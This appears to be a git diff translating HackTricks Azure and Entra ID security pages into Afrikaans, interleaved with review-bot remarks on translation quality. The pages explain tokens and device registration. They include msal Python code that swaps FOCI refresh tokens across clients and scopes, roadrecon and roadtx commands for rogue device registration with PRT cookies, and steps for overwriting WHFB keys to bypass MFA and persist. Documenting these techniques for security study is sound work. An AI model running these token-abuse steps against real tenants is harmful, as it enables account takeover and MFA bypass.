Azure **ABAC** (attribute-based access control) builds on Azure RBAC by adding **role assignment conditions based on attributes** in the context of specific actions. A _role assignment condition_ is an **additional check that you can optionally add to your role assignment** to provide more fine-grained access control. A condition filters down permissions granted as a part of the role definition and role assignment. For example, you can **add a condition that requires an object to have a specific tag to read the object**.\
You **cannot** explicitly **deny** **access** to specific resources **using conditions**.
Azure **ABAC** (attribuut-gebaseerde toegangbeheer) bou op Azure RBAC deur **roltoekenningsvoorwaardes gebaseer op attribuute** in die konteks van spesifieke aksies by te voeg. 'n _roltoekenningsvoorwaarde_ is 'n **addisionele kontrole wat jy opsioneel aan jou roltoekenning kan voeg** om meer fyn-gegradeerde toegangbeheer te bied. 'n Voorwaarde filter die toestemmings wat as deel van die roldefinisie en roltoekenning toegeken word. Byvoorbeeld, jy kan **'n voorwaarde byvoeg wat vereis dat 'n objek 'n spesifieke etiket moet hê om die objek te lees**.\
Jy **kan nie** eksplisiet **toegang** tot spesifieke hulpbronne **weier nie** **met behulp van voorwaardes**.
## References
## Verwysings
- [https://learn.microsoft.com/en-us/azure/governance/management-groups/overview](https://learn.microsoft.com/en-us/azure/governance/management-groups/overview)
- [https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/organize-subscriptions)
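Review bot: the translated line `E however, in sommige gevalle wil jy dalk ...` (replacing `However, in some cases you might want ...`) keeps a stray English fragment where a single Afrikaans connective belongs; suggest `Egter, in sommige gevalle wil jy dalk ...` or `In sommige gevalle wil jy egter dalk ...`. The heading `### Toestemmings Erf` reads as a verb phrase rather than a noun; `### Oorerwing van Toestemmings` matches `Permissions Inheritance`. In the RBAC paragraph `prinsiep` means "principle"; for a security principal use `prinsipaal` or `identiteit`. The JSON policy example is re-indented but otherwise identical, which adds whitespace-only noise to a translation commit; fenced code should be carried over untouched so the hunks stay reviewable.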
@@ -379,7 +375,3 @@ You **cannot** explicitly **deny** **access** to specific resources **using cond
- [https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration](https://stackoverflow.com/questions/65922566/what-are-the-differences-between-service-principal-and-app-registration)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -4,98 +4,97 @@
## Basic Information
Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implements the OAuth 2.0 authorization framework and the OpenID Connect (OIDC) authentication protocol to manage access to resources.
Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as the foundational authentication and authorization system for services like Microsoft 365 and Azure Resource Manager. Azure AD implementeer die OAuth 2.0-autoriseringsraamwerk en die OpenID Connect (OIDC) autentikasieprotokol om toegang tot hulpbronne te bestuur.
### OAuth
**Key Participants in OAuth 2.0:**
**Belangrike Deelnemers in OAuth 2.0:**
1. **Resource Server (RS):** Protects resources owned by the resource owner.
2. **Resource Owner (RO):** Typically an end-user who owns the protected resources.
3. **Client Application (CA):** An application seeking access to resources on behalf of the resource owner.
4. **Authorization Server (AS):** Issues access tokens to client applications after authenticating and authorizing them.
1. **Hulpbronbediener (RS):** Beskerm hulpbronne wat deur die hulpbron eienaar besit word.
2. **Hulpbron Eienaar (RO):** Tipies 'n eindgebruiker wat die beskermde hulpbronne besit.
3. **Kliënttoepassing (CA):** 'n Toepassing wat toegang tot hulpbronne soek namens die hulpbron eienaar.
4. **Autoriseringsbediener (AS):** Gee toegangstokens aan kliënttoepassings nadat dit hulle geverifieer en geautoriseer het.
**Scopes and Consent:**
**Skoppe en Toestemming:**
- **Scopes:** Granular permissions defined on the resource server that specify access levels.
- **Consent:** The process by which a resource owner grants a client application permission to access resources with specific scopes.
- **Skoppe:** Fyn gespesifiseerde toestemmings op die hulpbronbediener wat toegangsvlakke spesifiseer.
- **Toestemming:** Die proses waardeur 'n hulpbron eienaar 'n kliënttoepassing toestemming gee om toegang tot hulpbronne met spesifieke skoppe te verkry.
**Microsoft 365 Integration:**
**Microsoft 365 Integrasie:**
- Microsoft 365 utilizes Azure AD for IAM and is composed of multiple "first-party" OAuth applications.
- These applications are deeply integrated and often have interdependent service relationships.
- To simplify user experience and maintain functionality, Microsoft grants "implied consent" or "pre-consent" to these first-party applications.
- **Implied Consent:** Certain applications are automatically **granted access to specific scopes without explicit user or administrator approva**l.
- These pre-consented scopes are typically hidden from both users and administrators, making them less visible in standard management interfaces.
- Microsoft 365 gebruik Azure AD vir IAM en bestaan uit verskeie "eerste-party" OAuth-toepassings.
- Hierdie toepassings is diep geïntegreer en het dikwels onderling afhanklike diensverhoudings.
- Om die gebruikerservaring te vereenvoudig en funksionaliteit te handhaaf, gee Microsoft "implisiete toestemming" of "vooraf toestemming" aan hierdie eerste-party toepassings.
- **Implisiete Toestemming:** Sekere toepassings word outomaties **toegang tot spesifieke skoppe sonder eksplisiete gebruiker of administrateur goedkeuring gegee**.
- Hierdie vooraf goedgekeurde skoppe is tipies verborge vir beide gebruikers en administrateurs, wat dit minder sigbaar maak in standaard bestuursinterfaces.
**Client Application Types:**
**Kliënttoepassing Tipes:**
1. **Confidential Clients:**
- Possess their own credentials (e.g., passwords or certificates).
- Can **securely authenticate themselves** to the authorization server.
2. **Public Clients:**
- Do not have unique credentials.
- Cannot securely authenticate to the authorization server.
- **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
1. **Vertroulike Kliënte:**
- Besit hul eie geloofsbriewe (bv. wagwoorde of sertifikate).
- Kan **veilig hulself autentiseer** by die autoriseringsbediener.
2. **Publieke Kliënte:**
- Het nie unieke geloofsbriewe nie.
- Kan nie veilig autentiseer by die autoriseringsbediener nie.
- **Sekuriteitsimplikasie:** 'n Aanvaller kan 'n publieke kliënttoepassing naboots wanneer hy tokens aan vra, aangesien daar geen meganisme is vir die autoriseringsbediener om die legitimiteit van die toepassing te verifieer nie.
## Authentication Tokens
There are **three types of tokens** used in OIDC:
Daar is **drie tipes tokens** wat in OIDC gebruik word:
- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
- A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
- A refresh token is encrypted and only Microsoft can decrypt it.
- Getting a new refresh token doesn't revoke the previous refresh token.
- [**Toegangstokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Die kliënt bied hierdie token aan die hulpbronbediener aan om **toegang tot hulpbronne** te verkry. Dit kan slegs gebruik word vir 'n spesifieke kombinasie van gebruiker, kliënt en hulpbron en **kan nie herroep word** tot vervaldatum nie - dit is 1 uur per standaard.
- **ID Tokens**: Die kliënt ontvang hierdie **token van die autoriseringsbediener**. Dit bevat basiese inligting oor die gebruiker. Dit is **gebind aan 'n spesifieke kombinasie van gebruiker en kliënt**.
- **Herfris Tokens**: Verskaf aan die kliënt saam met toegangstoken. Gebruik om **nuwe toegang en ID tokens te verkry**. Dit is gebind aan 'n spesifieke kombinasie van gebruiker en kliënt en kan herroep word. Standaard vervaldatum is **90 dae** vir inaktiewe herfris tokens en **geen vervaldatum vir aktiewe tokens** (dit is moontlik om nuwe herfris tokens van 'n herfris token te verkry).
- 'n Herfris token moet gekoppel wees aan 'n **`aud`**, aan sekere **skoppe**, en aan 'n **tenant** en dit moet slegs in staat wees om toegangstokens vir daardie aud, skoppe (en nie meer nie) en tenant te genereer. Dit is egter nie die geval met **FOCI toepassings tokens** nie.
- 'n Herfris token is versleuteld en slegs Microsoft kan dit ontsleutel.
- Om 'n nuwe herfris token te verkry, herroep nie die vorige herfris token nie.
> [!WARNING]
> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
> Inligting vir **voorwaardelike toegang** is **gestoor** binne die **JWT**. So, as jy die **token van 'n toegelate IP-adres** aan vra, sal daardie **IP** in die token **gestoor** word en dan kan jy daardie token van 'n **nie-toegelate IP gebruik om toegang tot die hulpbronne** te verkry.
### Access Tokens "aud"
The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
Die veld wat in die "aud" veld aangedui word, is die **hulpbronbediener** (die toepassing) wat gebruik word om die aanmelding uit te voer.
The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
Die opdrag `az account get-access-token --resource-type [...]` ondersteun die volgende tipes en elkeen van hulle sal 'n spesifieke "aud" in die resulterende toegangstoken voeg:
> [!CAUTION]
> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
> Let daarop dat die volgende net die API's is wat deur `az account get-access-token` ondersteun word, maar daar is meer.
<details>
<summary>aud examples</summary>
<summary>aud voorbeelde</summary>
- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
- `https://graph.windows.net/`
- **aad-graph (Azure Active Directory Graph API)**: Gebruik om toegang te verkry tot die ouer Azure AD Graph API (verouderd), wat toepassings toelaat om gidsdata in Azure Active Directory (Azure AD) te lees en te skryf.
- `https://graph.windows.net/`
* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
- `https://management.core.windows.net/ or https://management.azure.com/`
* **arm (Azure Resource Manager)**: Gebruik om Azure hulpbronne te bestuur deur die Azure Resource Manager API. Dit sluit operasies in soos die skep, opdateer en verwyder van hulpbronne soos virtuele masjiene, stoor rekeninge, en meer.
- `https://management.core.windows.net/ of https://management.azure.com/`
- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
- `https://batch.core.windows.net/`
- **batch (Azure Batch Services)**: Gebruik om toegang te verkry tot Azure Batch, 'n diens wat grootmaat parallelle en hoë-prestasie rekenaar toepassings doeltreffend in die wolk moontlik maak.
- `https://batch.core.windows.net/`
* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
- `https://datalake.azure.net/`
* **data-lake (Azure Data Lake Storage)**: Gebruik om te kommunikeer met Azure Data Lake Storage Gen1, wat 'n skaalbare data berging en analise diens is.
- `https://datalake.azure.net/`
- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
- `https://rest.media.azure.net`
- **media (Azure Media Services)**: Gebruik om toegang te verkry tot Azure Media Services, wat wolk-gebaseerde media verwerking en aflewering dienste vir video en klank inhoud bied.
- `https://rest.media.azure.net`
* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
- `https://graph.microsoft.com`
* **ms-graph (Microsoft Graph API)**: Gebruik om toegang te verkry tot die Microsoft Graph API, die verenigde eindpunt vir Microsoft 365 dienste data. Dit laat jou toe om data en insigte van dienste soos Azure AD, Office 365, Enterprise Mobility, en Sekuriteitsdienste te verkry.
- `https://graph.microsoft.com`
- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
- `https://ossrdbms-aad.database.windows.net`
- **oss-rdbms (Azure Open Source Relational Databases)**: Gebruik om toegang te verkry tot Azure Databasis dienste vir oopbron relationele databasis enjin soos MySQL, PostgreSQL, en MariaDB.
- `https://ossrdbms-aad.database.windows.net`
</details>
### Access Tokens Scopes "scp"
### Access Tokens Skoppe "scp"
The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
Die skop van 'n toegangstoken word binne die scp sleutel binne die toegangstoken JWT gestoor. Hierdie skoppe definieer waartoe die toegangstoken toegang het.
If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
### Get refresh & access token example
As 'n JWT toegelaat word om 'n spesifieke API te kontak, maar **nie die skop het** om die aangevraagde aksie uit te voer nie, sal dit **nie in staat wees om die aksie** met daardie JWT uit te voer nie.
### Kry herfris & toegang token voorbeeld
```python
# Code example from https://github.com/secureworks/family-of-client-ids-research
import msal
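Review bot: the first sentence of the opening paragraph (`Entra ID is Microsoft's cloud-based identity and access management (IAM) platform, serving as ...`) is left in English in the translated line while only the second sentence is translated; translate the whole paragraph. `Skoppe` is used for OAuth `Scopes` throughout this hunk (`**Skoppe en Toestemming:**`, `### Access Tokens Skoppe "scp"`), but `skop` means a kick in Afrikaans; either keep the technical term `scopes`, as the FOCI section later in this file does, or use `omvang`/`bestek`, and apply one choice across the file. Several headings stay untranslated while their body text is translated (`## Basic Information`, `## Authentication Tokens`, `### Access Tokens "aud"`), and `### Access Tokens Skoppe "scp"` is only half translated. In the arm entry the translated code span `` `https://management.core.windows.net/ of https://management.azure.com/` `` places prose inside a code literal; split it into two code spans joined by `of`. Terminology also drifts within the file: `Herfris Tokens` and `tenant` here versus `verfrissingstokens` and `huurder` later; pick one term per concept.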
@@ -107,17 +106,17 @@ from typing import Any, Dict, List
# LOGIN VIA CODE FLOW AUTHENTICATION
azure_cli_client = msal.PublicClientApplication(
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
)
device_flow = azure_cli_client.initiate_device_flow(
scopes=["https://graph.microsoft.com/.default"]
scopes=["https://graph.microsoft.com/.default"]
)
print(device_flow["message"])
# Perform device code flow authentication
azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
device_flow
device_flow
)
pprint(azure_cli_bearer_tokens_for_graph_api)
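Review bot: the lines re-emitted in this hunk (`"04b07795-8ddb-461a-bbee-02f9e1bf7b46"`, `scopes=["https://graph.microsoft.com/.default"]`, `device_flow`) are textually unchanged and differ only in indentation, so the commit rewrites whitespace inside a Python code block it was never meant to translate. Whitespace is significant in Python; the block should be copied byte-identical from the source, and the translation step should skip fenced code entirely.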
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api)
# DECODE JWT
def decode_jwt(base64_blob: str) -> Dict[str, Any]:
"""Decodes base64 encoded JWT blob"""
return jwt.decode(
base64_blob, options={"verify_signature": False, "verify_aud": False}
)
"""Decodes base64 encoded JWT blob"""
return jwt.decode(
base64_blob, options={"verify_signature": False, "verify_aud": False}
)
decoded_access_token = decode_jwt(
azure_cli_bearer_tokens_for_graph_api.get("access_token")
azure_cli_bearer_tokens_for_graph_api.get("access_token")
)
pprint(decoded_access_token)
# GET NEW ACCESS TOKEN AND REFRESH TOKEN
new_azure_cli_bearer_tokens_for_graph_api = (
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
# Same scopes as original authorization
scopes=["https://graph.microsoft.com/.default"],
)
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
# Same scopes as original authorization
scopes=["https://graph.microsoft.com/.default"],
)
)
pprint(new_azure_cli_bearer_tokens_for_graph_api)
```
## FOCI Tokens Privilege Escalation
Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
Voorheen is genoem dat verfrissingstokens aan die **scopes** waaraan dit gegenereer is, aan die **toepassing** en **huurder** waaraan dit gegenereer is, gekoppel moet wees. As enige van hierdie grense oorgesteek word, is dit moontlik om voorregte te verhoog, aangesien dit moontlik sal wees om toegangstokens vir ander hulpbronne en huurders te genereer waartoe die gebruiker toegang het en met meer scopes as wat oorspronklik bedoel was.
Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
Boonop, **dit is moontlik met alle verfrissingstokens** in die [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra-rekeninge, Microsoft persoonlike rekeninge, en sosiale rekeninge soos Facebook en Google) omdat die [**dokumentasie**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) noem: "Verfrissingstokens is gebonde aan 'n kombinasie van gebruiker en kliënt, maar **is nie aan 'n hulpbron of huurder gekoppel nie**. 'n Kliënt kan 'n verfrissingstoken gebruik om toegangstokens te verkry **oor enige kombinasie van hulpbron en huurder** waar dit toestemming het om dit te doen. Verfrissingstokens is versleuteld en slegs die Microsoft identity platform kan dit lees."
Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
Boonop, let daarop dat die FOCI-toepassings openbare toepassings is, so **geen geheim is nodig** om by die bediener te autentiseer.
Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
Dan bekende FOCI-kliënte wat in die [**oorspronklike navorsing**](https://github.com/secureworks/family-of-client-ids-research/tree/main) gerapporteer is, kan [**hier gevind word**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
### Get different scope
Following with the previous example code, in this code it's requested a new token for a different scope:
Volgende met die vorige voorbeeldkode, in hierdie kode word 'n nuwe token vir 'n ander scope aangevra:
```python
# Code from https://github.com/secureworks/family-of-client-ids-research
azure_cli_bearer_tokens_for_outlook_api = (
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
new_azure_cli_bearer_tokens_for_graph_api.get(
"refresh_token"
),
# But different scopes than original authorization
scopes=[
"https://outlook.office.com/.default"
],
)
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
new_azure_cli_bearer_tokens_for_graph_api.get(
"refresh_token"
),
# But different scopes than original authorization
scopes=[
"https://outlook.office.com/.default"
],
)
)
pprint(azure_cli_bearer_tokens_for_outlook_api)
```
### Get different client and scopes
### Kry verskillende kliënt en skope
```python
# Code from https://github.com/secureworks/family-of-client-ids-research
microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
microsoft_office_bearer_tokens_for_graph_api = (
# This is a different client application than we used in the previous examples
microsoft_office_client.acquire_token_by_refresh_token(
# But we can use the refresh token issued to our original client application
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
# And request different scopes too
scopes=["https://graph.microsoft.com/.default"],
)
# This is a different client application than we used in the previous examples
microsoft_office_client.acquire_token_by_refresh_token(
# But we can use the refresh token issued to our original client application
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
# And request different scopes too
scopes=["https://graph.microsoft.com/.default"],
)
)
# How is this possible?
pprint(microsoft_office_bearer_tokens_for_graph_api)
```
## References
## Verwysings
- [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
{{#include ../../../banners/hacktricks-training.md}}
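Review bot: the docstring and `return` lines of `decode_jwt` are re-emitted with changed indentation; if the body under `def decode_jwt(...)` loses its indentation the snippet no longer parses, so these code-only changes should be reverted to the source text. In the prose, `Dan bekende FOCI-kliënte wat ... gerapporteer is, kan hier gevind word` is a word-for-word rendering of `Then known FOCI clients ...`; `Die bekende FOCI-kliënte wat ... gerapporteer is, kan hier gevind word` reads correctly. `Volgende met die vorige voorbeeldkode` is likewise literal; `Voortbouend op die vorige voorbeeldkode` is idiomatic. The headings `## FOCI Tokens Privilege Escalation` and `### Get different scope` are left in English while `### Kry verskillende kliënt en skope` is translated, and `skope` there is a third spelling alongside `scopes` in this hunk and `skoppe` earlier in the file; settle on one.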

View File

@@ -4,21 +4,19 @@
## Basic Information
When a device joins AzureAD a new object is created in AzureAD.
Wanneer 'n toestel by AzureAD aansluit, word 'n nuwe objek in AzureAD geskep.
When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
Wanneer 'n toestel geregistreer word, **word die gebruiker gevra om in te log met sy rekening** (wat MFA vra indien nodig), dan versoek dit tokens vir die toestelregistrasiediens en vra dan 'n finale bevestigingsprompt.
Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
Dan word twee RSA-sleutelpaar in die toestel gegenereer: Die **toestelsleutel** (**publieke** sleutel) wat na **AzureAD** gestuur word en die **transport** sleutel (**private** sleutel) wat in TPM gestoor word indien moontlik.
Dan word die **objek** in **AzureAD** geskep (nie in Intune nie) en AzureAD gee 'n **sertifikaat** wat deur dit onderteken is, terug aan die toestel. Jy kan nagaan dat die **toestel AzureAD-verbonden** is en inligting oor die **sertifikaat** (soos of dit deur TPM beskerm word).
```bash
dsregcmd /status
```
Na die toestelregistrasie word 'n **Primary Refresh Token** deur die LSASS CloudAP-module aangevra en aan die toestel gegee. Met die PRT word ook die **sessiesleutel versleuteld sodat slegs die toestel dit kan ontsleutel** (met die publieke sleutel van die vervoersleutel) en dit is **nodig om die PRT te gebruik.**
After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
For more information about what is a PRT check:
Vir meer inligting oor wat 'n PRT is, kyk:
{{#ref}}
az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
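Review bot: `twee RSA-sleutelpaar` should be the plural `twee RSA-sleutelpare`, and `AzureAD-verbonden` is a Dutch form; Afrikaans would be `by AzureAD aangesluit`, matching `aansluit` used in the first translated sentence of this hunk. The transport key is `transport sleutel` in one paragraph and `vervoersleutel` in the next; use one term. The heading `## Basic Information` is left untranslated while the body below it is translated.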
@@ -26,19 +24,18 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
### TPM - Trusted Platform Module
The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
Die **TPM** **beskerm** teen sleutel **onttrekking** van 'n afgeskakel toestel (as dit deur 'n PIN beskerm word) en teen die onttrekking van die private materiaal uit die OS-laag.\
Maar dit **beskerm nie** teen **sniffing** van die fisiese verbinding tussen die TPM en CPU of **gebruik van die kriptografiese materiaal** in die TPM terwyl die stelsel loop vanaf 'n proses met **SYSTEM** regte.
If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
As jy die volgende bladsy kyk, sal jy sien dat **diefstal van die PRT** gebruik kan word om toegang te verkry soos 'n **gebruiker**, wat wonderlik is omdat die **PRT op toestelle geleë is**, so dit kan van hulle gesteel word (of as dit nie gesteel word, misbruik word om nuwe ondertekeningsleutels te genereer):
{{#ref}}
az-lateral-movement-cloud-on-prem/pass-the-prt.md
{{#endref}}
## Registering a device with SSO tokens
It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
## Registrasie van 'n toestel met SSO tokens
Dit sou moontlik wees vir 'n aanvaller om 'n token vir die Microsoft toestelregistrasiediens van die gecompromitteerde toestel aan te vra en dit te registreer:
```bash
# Initialize SSO flow
roadrecon auth prt-init
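Review bot: `gecompromitteerde toestel` uses the Dutch spelling; Afrikaans is `gekompromitteerde toestel`. `van 'n afgeskakel toestel` needs the attributive form `afgeskakelde toestel`. `sniffing` is kept as an English term of art in the TPM paragraph, which is fine, but the same concept appears as `gesnif` in the WHFB list later in this file; keep the treatment consistent.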
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
# Custom pyhton script to register a device (check roadtx)
registerdevice.py
```
Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
Which will give you a **sertifikaat wat jy kan gebruik om in die toekoms vir PRTs te vra**. Daarom om volharding te handhaaf en **MFA te omseil** omdat die oorspronklike PRT-token wat gebruik is om die nuwe toestel te registreer **reeds MFA-toestemmings toegeken het**.
> [!TIP]
> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
> Let daarop dat jy toestemming nodig het om **nuwe toestelle te registreer** om hierdie aanval uit te voer. Ook, die registrasie van 'n toestel beteken nie dat die toestel **toegelaat sal word om in Intune te registreer** nie.
> [!CAUTION]
> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
> Hierdie aanval is in September 2021 reggestel aangesien jy nie meer nuwe toestelle kan registreer met 'n SSO-token nie. Dit is egter steeds moontlik om toestelle op 'n wettige manier te registreer (met gebruikersnaam, wagwoord en MFA indien nodig). Kyk: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
## Overwriting a device ticket
## Oorskrywing van 'n toestelkaartjie
It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
Dit was moontlik om 'n **toestelkaartjie aan te vra**, die huidige een van die toestel te **oorskryf**, en tydens die vloei die **PRT te steel** (so geen behoefte om dit van die TPM te steel nie. Vir meer inligting [**kyk na hierdie praatjie**](https://youtu.be/BduCn8cLV1A).
<figure><img src="../../images/image (32).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> However, this was fixed.
> Dit is egter reggestel.
## Overwrite WHFB key
## Oorskrywing van WHFB-sleutel
[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
[**Kyk die oorspronklike skyfies hier**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
Attack summary:
Aanval opsomming:
- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
- This also provides **persistence**
- Dit is moontlik om die **geregistreerde WHFB** sleutel van 'n **toestel** via SSO te **oorskryf**
- Dit **verslaan TPM-beskerming** aangesien die sleutel **gesnif word tydens die generasie** van die nuwe sleutel
- Dit bied ook **volharding**
<figure><img src="../../images/image (34).png" alt=""><figcaption></figcaption></figure>
Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
Then, it's possible to generate a new key with:
Gebruikers kan hul eie searchableDeviceKey eienskap via die Azure AD Graph wysig, egter, die aanvaller moet 'n toestel in die tenant hê (geregistreer op die vlug of 'n gesteelde sertifikaat + sleutel van 'n wettige toestel hê) en 'n geldige toegangstoken vir die AAD Graph.
Dan is dit moontlik om 'n nuwe sleutel te genereer met:
```bash
roadtx genhellokey -d <device id> -k tempkey.key
```
and then PATCH the information of the searchableDeviceKey:
en dan PATCH die inligting van die searchableDeviceKey:
<figure><img src="../../images/image (36).png" alt=""><figcaption></figcaption></figure>
It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
Dit is moontlik om 'n toegangstoken van 'n gebruiker te verkry via **device code phishing** en die vorige stappe te misbruik om **sy toegang te steel**. Vir meer inligting, kyk:
{{#ref}}
az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
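Review bot: the translated sentence "Dit was moontlik om 'n **toestelkaartjie aan te vra** ..." carries over the unclosed parenthesis from the English line above it ("(so geen behoefte om dit van die TPM te steel nie." never closes); close it before "Vir meer inligting" or drop the opening bracket. The rest of the hunk (the three attack-summary bullets and the two paragraphs on searchableDeviceKey) maps to the source line for line and reads correctly.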
@@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
<figure><img src="../../images/image (37).png" alt=""><figcaption></figcaption></figure>
## References
## Verwysings
- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,10 +2,10 @@
